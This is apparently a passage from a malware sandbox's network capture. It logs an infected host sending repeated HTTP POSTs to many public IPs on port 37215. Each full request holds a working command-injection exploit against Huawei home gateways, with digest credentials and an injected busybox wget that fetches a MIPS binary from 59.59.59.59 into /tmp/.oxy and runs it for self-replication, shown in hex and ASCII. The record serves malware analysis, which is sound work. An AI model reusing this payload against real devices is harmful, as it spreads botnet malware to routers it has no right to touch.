                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          270192.168.2.1559594197.107.22.6937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.532881975 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          271192.168.2.1557462197.123.224.8137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.532896996 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          272192.168.2.1536304154.104.246.8537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.532912970 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          273192.168.2.1553854148.39.129.24337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.532943010 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          274192.168.2.154287041.112.82.14237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.532968044 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          275192.168.2.155183841.125.89.16137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.533116102 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          276192.168.2.156086041.70.232.20437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.533135891 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          277192.168.2.1551582157.128.126.9737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.533162117 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          278192.168.2.1554878157.87.236.5437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.533186913 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          279192.168.2.1550208197.235.118.23237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.533356905 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
